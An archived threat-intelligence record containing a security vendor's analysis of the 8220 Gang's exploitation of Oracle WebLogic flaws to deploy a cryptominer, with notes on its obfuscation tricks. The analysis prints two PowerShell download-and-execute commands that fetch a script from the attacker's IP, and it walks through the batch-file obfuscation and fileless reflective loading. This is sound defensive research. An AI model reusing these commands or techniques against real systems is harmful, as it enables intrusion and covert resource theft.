{ "id": "76902281-2cc0-4625-8110-fc707e1b6bba", "created_at": "2026-04-06T00:11:06.522892Z", "updated_at": "2026-04-10T03:28:21.016375Z", "deleted_at": null, "sha1_hash": "a98e9cc9cca17aef9d6ae4568f8e91e30a42964b", "title": "Decoding Water Sigbin's Latest Obfuscation Tricks", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1734665, "plain_text": "Decoding Water Sigbin's Latest Obfuscation Tricks\r\nBy By: Sunil Bharti May 30, 2024 Read time: 5 min (1382 words)\r\nPublished: 2024-05-30 · Archived: 2026-04-02 11:07:21 UTC\r\nAPT \u0026 Targeted Attacks\r\nWater Sigbin (aka the 8220 Gang) exploited Oracle WebLogic vulnerabilities to deploy a cryptocurrency miner\r\nusing a PowerShell script. The threat actor also adopted new techniques to conceal its activities, making attacks\r\nharder to defend against.\r\nSummary\r\nWater Sigbin exploited the vulnerabilities CVE-2017-3506 and CVE-2023-21839 to deploy a\r\ncryptocurrency miner via a PowerShell script.\r\nThe gang employed obfuscation techniques, such as hexadecimal encoding of URLs and using HTTP over\r\nport 443, allowing for stealthy payload delivery.\r\nThe PowerShell script and the resulting batch file involved complex encoding, using environment variables\r\nto hide malicious code within seemingly benign script components.\r\nThe group performed fileless execution by using .NET reflection techniques in PowerShell scripts, which\r\nallows the malware code to run solely in memory, avoiding disk-based detection mechanisms.\r\nThe continuous evolution of threat actor tools, tactics, and procedures (TTPs) highlights the need for\r\norganizations to remain vigilant and adopt various cybersecurity best practices, like regular patch\r\nmanagement, employee training, and incident response plans\r\nWater Sigbin (aka the 8220 Gang) is a China-based threat actor that has been active since at least 2017. It focuses\r\non deploying cryptocurrency-mining malware, primarily in cloud-based environments and Linux servers. The\r\ngroup has been known to integrate vulnerability exploitation as part of its wide array of TTPs.\r\nIn our previous discussion on the the group's tactics, we looked into how it operates using ever-evolving and\r\ncomplex methods.  However, cyberthreats rarely remain stagnant, with threat actors constantly finding new ways\r\nto outsmart defenders. Recently, we’ve observed the Water Sigbin using new techniques and methods to hide its\r\nactivities, making the group’s attacks more difficult to defend systems against.\r\nCVE-2017-3506 and CVE-2023-21839 exploitation\r\nWe found the threat actor exploiting vulnerabilities with Oracle WebLogic server CVE-2017-3506 (a vulnerability\r\nallowing remote OS command execution) and  CVE-2023-21839 (an insecure deserialization vulnerability) to\r\ndeploy a cryptocurrency miner via a PowerShell script named bin.ps1 on the victim host. Upon closer examination\r\nof the group’s tools, tactics and procedures (TTPs), we determined the exploitation to be the work of Water Sigbin,\r\nindicating that it is continuously updating its deployment scripts and tools.\r\nhttps://www.trendmicro.com/en_us/research/24/e/decoding-8220-latest-obfuscation-tricks.html\r\nPage 1 of 7\n\nWe observed the following attack payload for CVE-2017-3506:\r\nFigure 1. The attack payload for CVE-2017-3506\r\nThe base64-encoded string in the attack payload is the following:\r\npowershell \"IEX(New-Object Net.WebClient).DownloadString('http://0xb9ac8092:443/bin.ps1')\"\r\nMeanwhile, the attack payload for CVE-2023-21839 can be seen in Figure 2.\r\nFigure 2. The attack payload for CVE-2023-21839\r\nFor this exploit, the base64 encoded string in attack payload is:\r\npowershell \"IEX(New-Object Net.WebClient).DownloadString('http://185.172.128.146:443/bin.ps1')\"\r\nWe found exploitation attempts in both Linux and Windows machines, with the threat actor deploying shell scripts\r\nin the former and a PowerShell script in the latter. For our analysis, we will refer to the techniques used in the\r\nWindows version of the exploitation, which shows  a noteworthy obfuscation technique used by Water Sigbin.\r\nAt the outset of payload delivery during vulnerability exploitation, the threat actor used the following techniques\r\nto evade detection:\r\nImplementation of hexadecimal encoding for URLs:\r\nThe URL used to download and deploy the PowerShell script is depicted in the following  image:\r\nFigure 3. Hex encoding of the URL\r\nThe dotted decimal notation of this URL translates to http://185.172.128.146:443/bin[.]ps1\r\nEmploying HTTP over port 443:\r\nAs seen in the previous URL, Water Sigbin uses HTTP on port 443 for stealthy communication.\r\nThe bin.ps1 shell script file consists of two parts:\r\n1. A lengthy base64-encoded string containing the binary code and instructions to execute it\r\n2. A function responsible for decoding the base64 string, writing the decoded contents into a file named\r\nmicrosoft_office365.bat in temporary directory, and silently executing it\r\nhttps://www.trendmicro.com/en_us/research/24/e/decoding-8220-latest-obfuscation-tricks.html\r\nPage 2 of 7\n\nFigure 4. Content of bin.ps1 PowerShell script\r\nThe base64-encoded content decoded by the Convert-Base64ToFileAndExecuteSilently function in the bin.ps1 file\r\nreveals the core script elements. This decoded content is then written to the temporary directory under the file\r\nname microsoft_office365.bat.\r\nAnalysis of microsoft_office365.bat\r\nThe microsoft_office365.bat script employs environment variables to obfuscate the original script code, making it\r\nseem complex and confusing. The script commences with the following code:\r\nFigure 5. Initial code of the script “microsoft_office365.bat”\r\nWhile examining the script, we observed that it seems like environment variables are being set, which seem like\r\nunreadable or gibberish data. However, after thorough analysis, it seems like the threat actors managed to\r\nimplement a very effective method to hide their malicious code.\r\nTo get the actual code, we need to decode the first “if” condition: \r\nhttps://www.trendmicro.com/en_us/research/24/e/decoding-8220-latest-obfuscation-tricks.html\r\nPage 3 of 7\n\nFigure 6. If condition in “microsoft_office365.bat”\r\nNext, we need to replace RxEGj with empty (“”) in every part of the code. After doing this, the first part of the\r\nscript will look like the following:\r\nFigure 7. Decoded first part of the script\r\nThe initial command cmd /c \"set __=\u0026rem” runs a new command prompt and sets the “__” environment variable\r\nto an empty string and then executes the rem (records comments in a batch file) command, which does nothing.\r\nOverall, the script section appears to be designed to start a new command prompt window in minimized mode and\r\nthen exit the current script.\r\nThe next two lengthy lines of base64-encoded content contains the actual binary code, requiring processing before\r\nit can be utilized. The attacker employs PowerShell methods for this processing.\r\nFigure 8. Encoded malicious binary code\r\nThe next section contains obfuscated PowerShell code, which does all the processing on the base64-encoded\r\nstring for further usage.\r\nhttps://www.trendmicro.com/en_us/research/24/e/decoding-8220-latest-obfuscation-tricks.html\r\nPage 4 of 7\n\nFigure 9. Obfuscated PowerShell code\r\nSimilarly, if we deobfuscate the remaining section by replacing RxEGj with an empty string (\"\"), we will obtain\r\nthe actual PowerShell code:\r\nFigure 10. Decoded PowerShell code\r\nThis PowerShell command performs the following actions:\r\n1. Decodes the base64 string ([Convert]::FromBase64String)\r\n2. Performs decryption ([System.Security.Cryptography.Aes]) of the very long string\r\n3. Decompresses the decrypted string ([IO.Compression.CompressionMode])\r\n4. Executes the malware code using DotNet in memory reflection ([System.Reflection.Assembly])\r\nhttps://www.trendmicro.com/en_us/research/24/e/decoding-8220-latest-obfuscation-tricks.html\r\nPage 5 of 7\n\nBy leveraging \"System.Reflection.Assembly,\" the attacker orchestrates a fileless execution strategy, ensuring that\r\nall operations occur solely in memory.\r\nConclusion\r\nThe Water Sigbin's activities involving the exploitation of CVE-2017-3506 and CVE-2023-21839 underscore the\r\nadaptability of modern threat actors. The use of sophisticated obfuscation techniques such as hexadecimal\r\nencoding of URLs, complex encoding within PowerShell and batch scripts, use of environment variables, and\r\nlayered obfuscation to conceal malicious code within seemingly benign scripts demonstrates that Water Sigbin is a\r\nthreat actor that can capably hide its tracks, making detection and prevention more challenging for security teams.\r\nThese evolving tactics signify a need for constant vigilance and proactive countermeasures to safeguard systems\r\nand networks against sophisticated threats.\r\nRecommendations\r\nTo effectively protect systems and networks against vulnerability exploitation such as those carried out by the\r\nWater Sigbin, organizations can implement a variety of cybersecurity best practices and proactive defense\r\nmeasures. Here are some recommendations:\r\n1. Patch management. Prioritize regular updates and patch management processes to ensure that all systems\r\nare running the latest software versions. Quickly apply security patches for known vulnerabilities,\r\nespecially those with publicly available exploits.\r\n2. Network segmentation. Use network segmentation to reduce the attack surface. By separating critical\r\nnetwork segments from the larger network, the impact of a potential vulnerability exploitation can be\r\nminimized,\r\n3. Regular security audits. Conduct security audits and vulnerability assessments regularly to identify and\r\nremediate potential weaknesses within the infrastructure before they can be exploited.\r\n4. Security awareness training. Educate employees about the common tactics used by attackers so they can\r\nrecognize and avoid falling victim to social engineering attacks that might precede vulnerability\r\nexploitation.\r\n5. Incident response plan. Develop, test, and maintain an incident response plan so your organization can\r\nrespond quickly and effectively to any security breaches or vulnerability exploitations.\r\n6. Threat intelligence. Subscribe to threat intelligence feeds to stay informed about the latest threats and\r\ntactics used by threat actors and advanced persistent threat (APT) groups.\r\nTrend solutions\r\nThe following protections exist to detect malicious activity and shield Trend customers against the exploitation of\r\nthe vulnerabilities discussed in this blog entry:\r\n1011716 - Oracle Weblogic Server Insecure Deserialization Vulnerability (CVE-2023-21839)\r\n1010550 - Oracle WebLogic WLS Security Component Remote Code Execution Vulnerability (CVE-2017-\r\n3506)\r\nhttps://www.trendmicro.com/en_us/research/24/e/decoding-8220-latest-obfuscation-tricks.html\r\nPage 6 of 7\n\nIndicators of Compromise (IOCs)\r\nThe indicators of compromise for this entry can be found here.\r\nMITRE ATT\u0026CK \r\n Tactic Technique Technique ID\r\nInitial Access   Exploit Public-Facing Application T1190\r\nExecution   Command and Scripting Interpreter: PowerShell  T1059.001 \r\nDefense Evasion\r\nDeobfuscate/Decode Files or Information T1140 \r\nObfuscated Files or Information: Command Obfuscation  T1027.010\r\nHide Artifacts: Hidden Window T1564.003\r\nProcess Injection: Portable Executable Injection T1055.002\r\nReflective Code Loading T1620\r\nCommand and Control\r\nData Encoding: Standard Encoding  T1132.001 \r\nApplication Layer Protocol: Web Protocols  T1071.001 \r\nIngress Tool Transfer T1105\r\nTags\r\nSource: https://www.trendmicro.com/en_us/research/24/e/decoding-8220-latest-obfuscation-tricks.html\r\nhttps://www.trendmicro.com/en_us/research/24/e/decoding-8220-latest-obfuscation-tricks.html\r\nPage 7 of 7", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia" ], "references": [ "https://www.trendmicro.com/en_us/research/24/e/decoding-8220-latest-obfuscation-tricks.html" ], "report_names": [ "decoding-8220-latest-obfuscation-tricks.html" ], "threat_actors": [ { "id": "0b8ea9bb-b729-438a-ae1f-4240db936fd7", "created_at": "2023-06-23T02:04:34.839947Z", "updated_at": "2026-04-10T02:00:04.99239Z", "deleted_at": null, "main_name": "8220 Gang", "aliases": [ "8220 Mining Group", "Returned Libra", "Water Sigbin" ], "source_name": "ETDA:8220 Gang", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "942c5fbc-31df-4aef-8268-e3ccf6692ec8", "created_at": "2024-07-09T02:00:04.434476Z", "updated_at": "2026-04-10T02:00:03.671196Z", "deleted_at": null, "main_name": "Water Sigbin", "aliases": [ "8220 Gang" ], "source_name": "MISPGALAXY:Water Sigbin", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434266, "ts_updated_at": 1775791701, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/a98e9cc9cca17aef9d6ae4568f8e91e30a42964b.pdf", "text": "https://archive.orkl.eu/a98e9cc9cca17aef9d6ae4568f8e91e30a42964b.txt", "img": "https://archive.orkl.eu/a98e9cc9cca17aef9d6ae4568f8e91e30a42964b.jpg" } }